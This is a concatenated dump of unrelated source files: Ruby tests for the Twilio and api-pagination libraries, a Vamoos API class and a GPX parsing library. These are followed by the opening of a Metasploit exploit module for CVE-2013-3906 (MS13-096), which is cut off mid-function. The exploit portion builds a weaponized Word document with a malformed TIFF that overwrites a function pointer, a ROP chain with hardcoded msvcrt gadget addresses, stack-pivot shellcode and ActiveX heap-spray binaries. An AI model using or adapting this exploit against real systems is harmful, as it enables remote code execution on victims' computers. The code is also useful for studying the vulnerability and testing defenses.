              "first_page_url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates?PageSize=50&Page=0",
              "key": "certificates",
              "next_page_url": null,
              "page": 0,
              "page_size": 50,
              "previous_page_url": null,
              "url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates?PageSize=50&Page=0"
          }
      }
      ]
    ))

    actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
                                             .certificates.list()

    expect(actual).to_not eq(nil)
  end

  it "receives read_full responses" do
    @holodeck.mock(Twilio::Response.new(
        200,
      %q[
      {
          "certificates": [
              {
                  "sid": "CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                  "friendly_name": "friendly_name",
                  "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                  "fleet_sid": "FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                  "device_sid": "THaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                  "thumbprint": "1234567890",
                  "date_created": "2016-07-30T20:00:00Z",
                  "date_updated": null,
                  "url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates/CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
              }
          ],
          "meta": {
              "first_page_url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates?PageSize=50&Page=0",
              "key": "certificates",
              "next_page_url": null,
              "page": 0,
              "page_size": 50,
              "previous_page_url": null,
              "url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates?PageSize=50&Page=0"
          }
      }
      ]
    ))

    actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
                                             .certificates.list()

    expect(actual).to_not eq(nil)
  end

  # update must issue POST .../Certificates/{sid}.
  it "can update" do
    @holodeck.mock(Twilio::Response.new(500, ''))

    expect {
      @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
                                      .certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').update()
    }.to raise_exception(Twilio::REST::TwilioError)

    expect(
    @holodeck.has_request?(Holodeck::Request.new(
        method: 'post',
        url: 'https://preview.twilio.com/DeployedDevices/Fleets/FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Certificates/CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
    ))).to eq(true)
  end

  it "receives update responses" do
    @holodeck.mock(Twilio::Response.new(
        200,
      %q[
      {
          "sid": "CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "friendly_name": "friendly_name",
          "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "fleet_sid": "FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "device_sid": "THaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
          "thumbprint": "1234567890",
          "date_created": "2016-07-30T20:00:00Z",
          "date_updated": "2016-07-30T20:00:00Z",
          "url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates/CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
      }
      ]
    ))

    actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
                                             .certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').update()

    expect(actual).to_not eq(nil)
  end
end | 36.871795 | 159 | 0.626796 |
e83245e33b10b32a31a87a959c01efe041487410 | 709 | # frozen_string_literal: true
module Vamoos
class PointOfInterest < Api
attr_accessor :id, :country, :country_iso, :created_at, :description, :icon, :icon_id,
:is_default_on, :latitude, :longitude, :meta, :name, :operator_id, :poi_range,
:updated_at
def initialize(params)
params.each { |key, value| send "#{key}=", value }
end
class << self
def create!(params)
result = post_json('/poi', { body: params.to_json })
new(result.parsed_response)
end
def update!(poi_id, params)
result = put_json("/poi/#{poi_id}", { body: params.to_json })
new(result.parsed_response)
end
end
end
end
| 25.321429 | 96 | 0.603667 |
08e4c619feb595de073da0f7b2950c4edf54fa51 | 3,119 | require 'spec_helper'
require 'support/shared_examples/existing_headers'
require 'support/shared_examples/first_page'
require 'support/shared_examples/middle_page'
require 'support/shared_examples/last_page'
describe NumbersAPI do
describe 'GET #index' do
let(:links) { last_response.headers['Link'].split(', ') }
let(:total) { last_response.headers['Total'].to_i }
let(:per_page) { last_response.headers['Per-Page'].to_i }
context 'without enough items to give more than one page' do
before { get '/numbers', :count => 10 }
it 'should not paginate' do
expect(last_response.headers.keys).not_to include('Link')
end
it 'should give a Total header' do
expect(total).to eq(10)
end
it 'should give a Per-Page header' do
expect(per_page).to eq(10)
end
it 'should list all numbers in the response body' do
body = '[1,2,3,4,5,6,7,8,9,10]'
expect(last_response.body).to eq(body)
end
end
context 'with existing Link headers' do
before { get '/numbers', :count => 30, :with_headers => true }
it_behaves_like 'an endpoint with existing Link headers'
end
context 'with enough items to paginate' do
context 'when on the first page' do
before { get '/numbers', :count => 100 }
it_behaves_like 'an endpoint with a first page'
end
context 'when on the last page' do
before { get '/numbers', :count => 100, :page => 10 }
it_behaves_like 'an endpoint with a last page'
end
context 'when somewhere comfortably in the middle' do
before { get '/numbers', :count => 100, :page => 2 }
it_behaves_like 'an endpoint with a middle page'
end
context 'with a max_per_page setting' do
before { get '/numbers', :count => 100, :per_page => 30 }
it 'should not go above the max_per_page_limit' do
body = '[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25]'
expect(last_response.body).to eq(body)
end
end
end
context 'with custom response headers' do
before do
ApiPagination.config.total_header = 'X-Total-Count'
ApiPagination.config.per_page_header = 'X-Per-Page'
get '/numbers', count: 10
end
after do
ApiPagination.config.total_header = 'Total'
ApiPagination.config.per_page_header = 'Per-Page'
end
let(:total) { last_response.header['X-Total-Count'].to_i }
let(:per_page) { last_response.header['X-Per-Page'].to_i }
it 'should give a X-Total-Count header' do
headers_keys = last_response.headers.keys
expect(headers_keys).not_to include('Total')
expect(headers_keys).to include('X-Total-Count')
expect(total).to eq(10)
end
it 'should give a X-Per-Page header' do
headers_keys = last_response.headers.keys
expect(headers_keys).not_to include('Per-Page')
expect(headers_keys).to include('X-Per-Page')
expect(per_page).to eq(10)
end
end
end
end
| 29.990385 | 86 | 0.631613 |
3315471d1e7e899768fd8cbc92a140ddbd370e9e | 12,377 | module GPX
class GPXFile < Base
attr_accessor :tracks,
:routes, :waypoints, :bounds, :lowest_point, :highest_point, :duration, :ns, :time, :name, :version, :creator, :description, :moving_duration
DEFAULT_CREATOR = "GPX RubyGem #{GPX::VERSION} -- http://dougfales.github.io/gpx/".freeze
# This initializer can be used to create a new GPXFile from an existing
# file or to create a new GPXFile instance with no data (so that you can
# add tracks and points and write it out to a new file later).
# To read an existing GPX file, do this:
# gpx_file = GPXFile.new(:gpx_file => 'mygpxfile.gpx')
# puts "Speed: #{gpx_file.average_speed}"
# puts "Duration: #{gpx_file.duration}"
# puts "Bounds: #{gpx_file.bounds}"
#
# To read a GPX file from a string, use :gpx_data.
# gpx_file = GPXFile.new(:gpx_data => '<xml ...><gpx>...</gpx>)
# To create a new blank GPXFile instance:
# gpx_file = GPXFile.new
# Note that you can pass in any instance variables to this form of the initializer, including Tracks or Segments:
# some_track = get_track_from_csv('some_other_format.csv')
# gpx_file = GPXFile.new(:tracks => [some_track])
#
def initialize(opts = {})
@duration = 0
@attributes = {}
@namespace_defs = []
@tracks = []
@time = nil
if opts[:gpx_file] || opts[:gpx_data]
if opts[:gpx_file]
gpx_file = opts[:gpx_file]
gpx_file = File.open(gpx_file) unless gpx_file.is_a?(File)
@xml = Nokogiri::XML(gpx_file)
else
@xml = Nokogiri::XML(opts[:gpx_data])
end
gpx_element = @xml.at('gpx')
@attributes = gpx_element.attributes
@namespace_defs = gpx_element.namespace_definitions
@version = gpx_element['version']
reset_meta_data
bounds_element = (begin
@xml.at('metadata/bounds')
rescue StandardError
nil
end)
if bounds_element
@bounds.min_lat = get_bounds_attr_value(bounds_element, %w[min_lat minlat minLat])
@bounds.min_lon = get_bounds_attr_value(bounds_element, %w[min_lon minlon minLon])
@bounds.max_lat = get_bounds_attr_value(bounds_element, %w[max_lat maxlat maxLat])
@bounds.max_lon = get_bounds_attr_value(bounds_element, %w[max_lon maxlon maxLon])
else
get_bounds = true
end
@time = begin
Time.parse(@xml.at('metadata/time').inner_text)
rescue StandardError
nil
end
@name = begin
@xml.at('metadata/name').inner_text
rescue StandardError
nil
end
@description = begin
@xml.at('metadata/desc').inner_text
rescue StandardError
nil
end
@xml.search('trk').each do |trk|
trk = Track.new(element: trk, gpx_file: self)
update_meta_data(trk, get_bounds)
@tracks << trk
end
@waypoints = []
@xml.search('wpt').each { |wpt| @waypoints << Waypoint.new(element: wpt, gpx_file: self) }
@routes = []
@xml.search('rte').each { |rte| @routes << Route.new(element: rte, gpx_file: self) }
@tracks.delete_if(&:empty?)
calculate_duration
else
reset_meta_data
opts.each { |attr_name, value| instance_variable_set("@#{attr_name}", value) }
unless @tracks.nil? || @tracks.size.zero?
@tracks.each { |trk| update_meta_data(trk) }
calculate_duration
end
end
@tracks ||= []
@routes ||= []
@waypoints ||= []
end
def get_bounds_attr_value(el, possible_names)
result = nil
possible_names.each do |name|
result = el[name]
break unless result.nil?
end
(begin
result.to_f
rescue StandardError
nil
end)
end
# Returns the distance, in kilometers, meters, or miles, of all of the
# tracks and segments contained in this GPXFile.
def distance(opts = { units: 'kilometers' })
case opts[:units]
when /kilometers/i
@distance
when /meters/i
(@distance * 1000)
when /miles/i
(@distance * 0.62)
end
end
# Returns the average speed, in km/hr, meters/hr, or miles/hr, of this
# GPXFile. The calculation is based on the total distance divided by the
# sum of duration of all segments of all tracks
# (not taking into accounting pause time).
def average_speed(opts = { units: 'kilometers' })
case opts[:units]
when /kilometers/i
distance / (moving_duration / 3600.0)
when /meters/i
(distance * 1000) / (moving_duration / 3600.0)
when /miles/i
(distance * 0.62) / (moving_duration / 3600.0)
end
end
# Crops any points falling within a rectangular area. Identical to the
# delete_area method in every respect except that the points outside of
# the given area are deleted. Note that this method automatically causes
# the meta data to be updated after deletion.
def crop(area)
reset_meta_data
keep_tracks = []
tracks.each do |trk|
trk.crop(area)
unless trk.empty?
update_meta_data(trk)
keep_tracks << trk
end
end
@tracks = keep_tracks
routes.each { |rte| rte.crop(area) }
waypoints.each { |wpt| wpt.crop(area) }
end
# Deletes any points falling within a rectangular area. The "area"
# parameter is usually an instance of the Bounds class. Note that this
# method cascades into similarly named methods of subordinate classes
# (i.e. Track, Segment), which means, if you want the deletion to apply
# to all the data, you only call this one (and not the one in Track or
# Segment classes). Note that this method automatically causes the meta
# data to be updated after deletion.
def delete_area(area)
reset_meta_data
keep_tracks = []
tracks.each do |trk|
trk.delete_area(area)
unless trk.empty?
update_meta_data(trk)
keep_tracks << trk
end
end
@tracks = keep_tracks
routes.each { |rte| rte.delete_area(area) }
waypoints.each { |wpt| wpt.delete_area(area) }
end
# Resets the meta data for this GPX file. Meta data includes the bounds,
# the high and low points, and the distance.
def reset_meta_data
@bounds = Bounds.new
@highest_point = nil
@lowest_point = nil
@distance = 0.0
@moving_duration = 0.0
end
# Updates the meta data for this GPX file. Meta data includes the
# bounds, the high and low points, and the distance. This is useful when
# you modify the GPX data (i.e. by adding or deleting points) and you
# want the meta data to accurately reflect the new data.
def update_meta_data(trk, get_bounds = true)
  # Fold one track into the file-level meta data: lowest/highest point by
  # elevation, optional bounds merge, and running distance/duration sums.
  low = trk.lowest_point
  high = trk.highest_point
  @lowest_point = low if low && (@lowest_point.nil? || low.elevation < @lowest_point.elevation)
  @highest_point = high if high && (@highest_point.nil? || high.elevation > @highest_point.elevation)
  @bounds.add(trk.bounds) if get_bounds
  @distance += trk.distance
  @moving_duration += trk.moving_duration
end
# Serialize the current GPXFile to a gpx file named <filename>.
# If the file does not exist, it is created. If it does exist, it is overwritten.
def write(filename, update_time = true)
  # Refresh the timestamp (unless suppressed and already set), default the
  # name to the file's basename, then serialize the generated XML to disk.
  @time = Time.now if update_time || @time.nil?
  @name ||= File.basename(filename)
  xml_doc = generate_xml_doc
  File.open(filename, 'w+') { |file| file.write(xml_doc.to_xml) }
end
def to_s(update_time = true)
  # Same serialization as #write, but returned as a string instead of
  # being written to a file.
  @time = Time.now if update_time || @time.nil?
  generate_xml_doc.to_xml
end
def inspect
"<#{self.class.name}:...>"
end
def recalculate_distance
  # Ask each track to recompute its own distance, then total them.
  @distance = @tracks.sum do |track|
    track.recalculate_distance
    track.distance
  end
end
private
# Flattens the stored root-element attributes and namespace definitions
# into one hash suitable for emitting on the <gpx> element: namespaced
# attributes become "prefix:name" keys, namespace defs become "xmlns" /
# "xmlns:prefix" keys.
def attributes_and_nsdefs_as_gpx_attributes
  gpx_header = @attributes.each_with_object({}) do |(name, attr), header|
    name = "#{attr.namespace.prefix}:#{name}" if attr.namespace
    header[name] = attr.value
  end
  @namespace_defs.each_with_object(gpx_header) do |nsdef, header|
    key = nsdef.prefix ? "xmlns:#{nsdef.prefix}" : 'xmlns'
    header[key] = nsdef.href
  end
end
# Builds the Nokogiri XML builder for this GPX file: root <gpx> element with
# the merged header attributes, name/time/bound metadata (inline for schema
# 1.0, wrapped in <metadata> otherwise), then all tracks, waypoints and
# routes. Returns the Builder; callers (#write, #to_s) call .to_xml on it.
def generate_xml_doc
@version ||= '1.1'
version_dir = version.tr('.', '/')
gpx_header = attributes_and_nsdefs_as_gpx_attributes
# Only fill in defaults that were not already present on the parsed input.
gpx_header['version'] = @version.to_s unless gpx_header['version']
gpx_header['creator'] = DEFAULT_CREATOR unless gpx_header['creator']
gpx_header['xsi:schemaLocation'] = "http://www.topografix.com/GPX/#{version_dir} http://www.topografix.com/GPX/#{version_dir}/gpx.xsd" unless gpx_header['xsi:schemaLocation']
gpx_header['xmlns:xsi'] = 'http://www.w3.org/2001/XMLSchema-instance' if !gpx_header['xsi'] && !gpx_header['xmlns:xsi']
# $stderr.puts gpx_header.keys.inspect
# rubocop:disable Metrics/BlockLength
doc = Nokogiri::XML::Builder.new do |xml|
xml.gpx(gpx_header) do
# version 1.0 of the schema doesn't support the metadata element, so push them straight to the root 'gpx' element
if @version == '1.0'
xml.name @name
xml.time @time.xmlschema
# NOTE(review): the GPX schema calls this element <bounds>; the code
# emits <bound> — confirm whether this is intentional.
xml.bound(
minlat: bounds.min_lat,
minlon: bounds.min_lon,
maxlat: bounds.max_lat,
maxlon: bounds.max_lon
)
else
xml.metadata do
xml.name @name
xml.time @time.xmlschema
xml.bound(
minlat: bounds.min_lat,
minlon: bounds.min_lon,
maxlat: bounds.max_lat,
maxlon: bounds.max_lon
)
end
end
# Tracks: each track becomes <trk> with nested <trkseg>/<trkpt> elements;
# optional time/elevation/extensions are emitted only when present.
unless tracks.nil?
tracks.each do |t|
xml.trk do
xml.name t.name
t.segments.each do |seg|
xml.trkseg do
seg.points.each do |p|
xml.trkpt(lat: p.lat, lon: p.lon) do
xml.time p.time.xmlschema unless p.time.nil?
xml.ele p.elevation unless p.elevation.nil?
xml << p.extensions.to_xml unless p.extensions.nil?
end
end
end
end
end
end
end
# Waypoints: every supported sub-element the waypoint responds to and has
# a value for is emitted dynamically via send.
unless waypoints.nil?
waypoints.each do |w|
xml.wpt(lat: w.lat, lon: w.lon) do
xml.time w.time.xmlschema unless w.time.nil?
Waypoint::SUB_ELEMENTS.each do |sub_elem|
xml.send(sub_elem, w.send(sub_elem)) if w.respond_to?(sub_elem) && !w.send(sub_elem).nil?
end
end
end
end
# Routes: <rte> with <rtept> children, again with optional time/elevation.
unless routes.nil?
routes.each do |r|
xml.rte do
xml.name r.name
r.points.each do |p|
xml.rtept(lat: p.lat, lon: p.lon) do
xml.time p.time.xmlschema unless p.time.nil?
xml.ele p.elevation unless p.elevation.nil?
end
end
end
end
end
end
end
# rubocop:enable Metrics/BlockLength
doc
end
# Calculates and sets the duration attribute by subtracting the time on
# the very first point from the time on the very last point.
# Computes @duration as the time of the very last point (last track, last
# segment) minus the time of the very first point. Any missing structure —
# no tracks, no segments, or an error while digging for points — leaves
# the duration at 0.
def calculate_duration
  @duration = 0
  return @duration if @tracks.nil? || @tracks.size.zero? ||
                      @tracks[0].segments.nil? || @tracks[0].segments.size.zero?
  first_point = @tracks.first.segments.first.points.first
  last_point = @tracks[-1].segments[-1].points[-1]
  @duration = last_point.time - first_point.time
rescue StandardError
  @duration = 0
end
end
end
| 35.062323 | 180 | 0.580835 |
1aca907eabc3befc1685a17c342eed29d58c0744 | 915 | require "rails_helper"
RSpec.describe V1::ConversationsController, type: :routing do
  describe "routing" do
    it "routes to #index" do
      expect(get: "/v1/conversations").to route_to("v1/conversations#index")
    end

    it "routes to #show" do
      expect(get: "/v1/conversations/1").to route_to("v1/conversations#show", id: "1")
    end

    it "routes to #create" do
      expect(post: "/v1/conversations").to route_to("v1/conversations#create")
    end

    it "routes to #update via PUT" do
      expect(put: "/v1/conversations/1").to route_to("v1/conversations#update", id: "1")
    end

    it "routes to #update via PATCH" do
      expect(patch: "/v1/conversations/1").to route_to("v1/conversations#update", id: "1")
    end

    it "routes to #destroy" do
      expect(delete: "/v1/conversations/1").to route_to("v1/conversations#destroy", id: "1")
    end
  end
end
| 30.5 | 98 | 0.634973 |
e9fe18a7cea6663eee62975f684f83f55646d19a | 1,424 | require 'test_helper'
class PrinciplesControllerTest < ActionController::TestCase
  setup do
    @principle = principles(:one)
  end

  test "should get index" do
    get :index
    assert_response :success
    assert_not_nil assigns(:principles)
  end

  test "should get new" do
    get :new
    assert_response :success
  end

  test "should create principle" do
    assert_difference('Principle.count') do
      post :create, principle: principle_params
    end

    assert_redirected_to principle_path(assigns(:principle))
  end

  test "should show principle" do
    get :show, id: @principle
    assert_response :success
  end

  test "should get edit" do
    get :edit, id: @principle
    assert_response :success
  end

  test "should update principle" do
    patch :update, id: @principle, principle: principle_params
    assert_redirected_to principle_path(assigns(:principle))
  end

  test "should destroy principle" do
    assert_difference('Principle.count', -1) do
      delete :destroy, id: @principle
    end

    assert_redirected_to principles_path
  end

  private

  # Full attribute hash mirrored from the fixture record, shared by the
  # create and update tests.
  def principle_params
    {
      author: @principle.author,
      case_webpage: @principle.case_webpage,
      casestudy: @principle.casestudy,
      description: @principle.description,
      image: @principle.image,
      title: @principle.title
    }
  end
end
| 28.48 | 234 | 0.731742 |
d580f94d13afac96929fefa0b2083d965a64c6df | 30,571 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
require 'nokogiri'
# NOTE(review): this globally monkey-patches the third-party
# Nokogiri::XML::Builder class; a Refinement would scope the change, but the
# exploit module below relies on the global patch being present.
module ::Nokogiri
module XML
class Builder
#
# Some XML documents don't declare the namespace before referencing, but Nokogiri requires one.
# So here's our hack to get around that by adding a new custom method to the Builder class
#
# Creates an element named +ns+ with a dummy namespace definition (the href
# is the literal string "href"), then makes that namespace the builder's
# current one so subsequent element calls are emitted under the +ns+ prefix.
# Returns self so calls can be chained.
def custom_root(ns)
e = @parent.create_element(ns)
e.add_namespace_definition(ns, "href")
@ns = e.namespace_definitions.find { |x| x.prefix == ns.to_s }
return self
end
end
end
end
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::RopDb
# Module metadata registration. Fixes two typos in the published
# description ("vlaue" -> "value", "argumenet" -> "argument"); all other
# metadata, options and payload constraints are unchanged.
def initialize(info={})
  super(update_info(info,
    'Name'           => "MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow",
    'Description'    => %q{
        This module exploits a vulnerability found in Microsoft's Tagged Image File Format.
      It was originally discovered in the wild, targeting Windows XP and Windows Server 2003
      users running Microsoft Office, specifically in the Middle East and South Asia region.
      The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a
      drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,
      and stored in the EAX register. The 32-bit register will run out of storage space to
      represent the large value, which ends up being 0, but it still gets pushed as a
      dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a
      chunk anyway with size 0, and the address of this chunk is used as the destination buffer
      of a memcpy function, where the source buffer is the EXIF data (an extended image format
      supported by TIFF), and is also user-controlled. A function pointer in the chunk returned
      by HeapAlloc will end up being overwritten by the memcpy function, and then later used
      in OGL!GdipCreatePath. By successfully controlling this function pointer, and the
      memory layout using ActiveX, it is possible to gain arbitrary code execution under the
      context of the user.
    },
    'License'        => MSF_LICENSE,
    'Author'         =>
      [
        'Unknown', # Some dude wrote it and deployed in the wild, but Haifei Li spotted it
        'sinn3r'   # Metasploit
      ],
    'References'     =>
      [
        [ 'CVE', '2013-3906' ],
        [ 'MSB', 'MS13-096' ],
        [ 'OSVDB', '99376' ],
        [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2896666' ],
        [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx' ]
      ],
    'Payload'        =>
      {
        # Stack pivot prologue: restore a sane stack pointer from the TEB
        # before the encoded payload runs.
        'PrependEncoder' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
                            "\x83\xC0\x08" +             # add eax, byte 8
                            "\x8b\x20" +                 # mov esp, [eax]
                            "\x81\xC4\x30\xF8\xFF\xFF",  # add esp, -2000
        'BadChars'       => "\x00"
      },
    'DefaultOptions' =>
      {
        'ExitFunction' => "process",
        'PrependMigrate' => true
      },
    'Platform'       => 'win',
    'Targets'        =>
      [
        # XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit)
        ['Windows XP SP3 with Office Standard 2010', {}],
      ],
    'Privileged'     => false,
    'DisclosureDate' => "Nov 5 2013", # Microsoft announcement
    'DefaultTarget'  => 0))

  register_options(
    [
      OptString.new('FILENAME', [true, 'The docx file', 'msf.docx']),
    ], self.class)
end
#
# Creates a TIFF that triggers the overflow
#
def make_tiff
# TIFF Header:
# TIFF ID = 'II' (Intel order)
# TIFF Version = 42d
# Offset of FID = 0x000049c8h
#
# Image Directory:
# Number of entries = 17d
# Entry[0] NewSubFileType = 0
# Entry[1] ImageWidth = 256d
# Entry[2] ImageHeight = 338d
# Entry[3] BitsPerSample = 8 8 8
# Entry[4] Compression = JPEG (6)
# Entry[5] Photometric Interpretation = RGP
# Entry[6] StripOffsets = 68 entries (349 bytes)
# Entry[7] SamplesPerPixel = 3
# Entry[8] RowsPerStrip = 5
# Entry[9] StripByteCounts = 68 entries (278 bytes)
# Entry[10] XResolution = 96d
# Entry[11] YResolution = 96d
# Entry[12] Planar Configuration = Clunky
# Entry[13] Resolution Unit = Inch
# Entry[14] Predictor = None
# Entry[15] JPEGInterchangeFormatLength = 5252h (1484h)
# Entry[16] JPEGInterchangeFormat = 13636d
# Notes:
# These values are extracted from the file to calculate the HeapAlloc size that result in the overflow:
# - JPEGInterchangeFormatLength
# - DWORD at offset 3324h (0xffffb898), no documentation for this
# - DWORDS after offset 3328h, no documentation for these, either.
# The DWORD at offset 4874h is what ends up overwriting the function pointer by the memcpy
# The trigger is really a TIF file, but is named as a JPEG in the docx package
# Load the pre-built trigger template shipped in the framework data dir.
buf = ''
path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906", "word", "media", "image1.jpeg")
::File.open(path, "rb") do |f|
buf = f.read
end
# Gain control of the call [eax+50h] instruction
# XCHG EAX, ESP; RETN msvcrt
# Patched value is 0x200f0700-0x50 so that [eax+50h] dereferences into the
# ActiveX heap spray region (see get_rop_payload / make_activex_bin, which
# both target addresses around 0x200f0704).
buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
buf
end
#
# Generates a payload
#
# Builds the 0x80000-byte spray body: a ROP chain (msvcrt, XP target) plus
# the encoded payload, padded into a 1024-byte block that also carries the
# POP ESP / pivot-address pair, then repeated until the buffer reaches
# 0x80000 bytes.
def get_rop_payload
  chain = [0x77c15ed5].pack('V') # XCHG EAX, ESP msvcrt
  chain << generate_rop_payload('msvcrt', '', { 'target' => 'xp' })
  chain << payload.encoded

  block = chain
  block << rand_text_alpha(1024 - 80 - chain.length)
  block << [0x77c34fbf, 0x200f0704].pack("V*") # pop esp # ret # from msvcrt
  block << rand_text_alpha(1024 - block.length)

  spray = ''
  spray << block while spray.length < 0x80000
  spray
end
#
# Creates an ActiveX bin that will be used as a spray in Office
#
# Hand-assembles one ActiveX .bin (an OLE Compound Document) whose tail
# carries the pivot gadget pair and the ROP/payload spray (@rop_payload).
# The byte layout and field order are load-bearing; do not reorder.
def make_activex_bin
#
# How an ActiveX bin is referred:
# document.xml.rels -> ActiveX[num].xml -> activeX[num].xml.rels -> ActiveX[num].bin
# Every bin is a Microsoft Compound Document File:
# http://www.openoffice.org/sc/compdocfileformat.pdf
# The bin file
mscd = ''
mscd << [0xe011cfd0].pack('V') # File identifier (first 4 byte)
mscd << [0xe11ab1a1].pack('V') # File identifier (second 4 byte)
mscd << [0x00000000].pack('V') * 4 # Unique Identifier
mscd << [0x003e].pack('v') # Revision number
mscd << [0x0003].pack('v') # Version number
mscd << [0xfffe].pack('v') # Byte order: Little-Endian
mscd << [0x0009].pack('v') # Sector size
mscd << [0x0006].pack('v') # Size of a short-sector
mscd << "\x00" * 10 # Not used
mscd << [0x00000001].pack('V') # Total number of sectors
mscd << [0x00000001].pack('V') # SecID for the first sector
mscd << [0x00000000].pack('V') # Not used
mscd << [0x00001000].pack('V') # Minimum size of a standard stream
mscd << [0x00000002].pack('V') # Sec ID of first sector
mscd << [0x00000001].pack('V') # Total number of sectors for the short-sector table
mscd << [0xfffffffe].pack('V') # SecID of first sector of the mastser sector table
mscd << [0x00000000].pack('V') # Total number of sectors for master sector talbe
mscd << [0x00000000].pack('V') # SecIDs
mscd << [0xffffffff].pack('V') * 4 * 59 # SecIDs
mscd[0x200, 4] = [0xfffffffd].pack('V')
mscd[0x204, 12] = [0xfffffffe].pack('V') * 3
mscd << Rex::Text.to_unicode("Root Entry")
mscd << [0x00000000].pack('V') * 11
mscd << [0x0016].pack('v') # Valid range of the previous char array
mscd << "\x05" # Type of entry (Root Storage Entry)
mscd << "\x00" # Node colour of the entry (red)
mscd << [0xffffffff].pack('V') # DirID of the left child node
mscd << [0xffffffff].pack('V') # DirID of the right child node
mscd << [0x00000001].pack('V') # DirID of the root node entry
# CLSID of the root storage — matches the ax:classid
# {1EFB6596-857C-11D1-B16A-00C0F0283628} referenced from make_activex_xml.
mscd << [0x1efb6596].pack('V')
mscd << [0x11d1857c].pack('V')
mscd << [0xc0006ab1].pack('V')
mscd << [0x283628f0].pack('V')
mscd << [0x00000000].pack('V') * 3
mscd << [0x287e3070].pack('V')
mscd << [0x01ce2654].pack('V')
mscd << [0x00000003].pack('V')
mscd << [0x00000100].pack('V')
mscd << [0x00000000].pack('V')
mscd << Rex::Text.to_unicode("Contents")
mscd << [0x00000000].pack('V') * 12
mscd << [0x01020012].pack('V')
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 10
mscd << [0x000000e4].pack('V')
mscd << [0x00000000].pack('V') * 18
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 29
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 12
mscd << [0x00000001].pack('V')
mscd << [0x00000002].pack('V')
mscd << [0x00000003].pack('V')
mscd << [0xfffffffe].pack('V')
mscd << [0xffffffff].pack('V') * 32 #52
# Pivot pair: same gadget/address pair that get_rop_payload embeds in each
# 1024-byte spray block (0x77c34fbf POP ESP # RETN, 0x200f0704 target).
mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
mscd << [0xffffffff].pack('V') * 18
mscd << @rop_payload
mscd
end
#
# Creates an activeX[num].xml file
# @param rid [String] The relationship ID (example: rId1)
# @return [String] XML document
#
def make_activex_xml(rid)
  # <ax:ocx> stanza binding relationship rId<rid> to the ActiveX control
  # CLSID used throughout the package (see make_activex_bin).
  ocx_attrs = {
    'ax:classid' => '{1EFB6596-857C-11D1-B16A-00C0F0283628}',
    'ax:license' => '9368265E-85FE-11d1-8BE3-0000F8754DA1',
    'ax:persistence' => 'persistStorage',
    'r:id' => "rId#{rid}",
    'xmlns:ax' => 'http://schemas.microsoft.com/office/2006/activeX',
    'xmlns:r' => @schema
  }
  doc = ::Nokogiri::XML('<?xml version="1.0" encoding="UTF-8" standalone="no"?>')
  ::Nokogiri::XML::Builder.with(doc) do |xml|
    xml.custom_root('ax')
    xml.ocx(ocx_attrs)
  end.to_xml(indent: 0)
end
#
# Creates an activeX[num].xml.rels
# @param relationships [Array] A collection of hashes with each containing:
# :id, :type, :target
# @return [String] XML document
#
def make_activex_xml_reals(rid, target_bin)
  # Single-relationship .rels document pointing rId<rid> at the control's
  # binary storage file.
  bin_rel_type = 'http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary'
  doc = ::Nokogiri::XML('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>')
  ::Nokogiri::XML::Builder.with(doc) do |xml|
    xml.Relationships('xmlns' => 'http://schemas.openxmlformats.org/package/2006/relationships') do
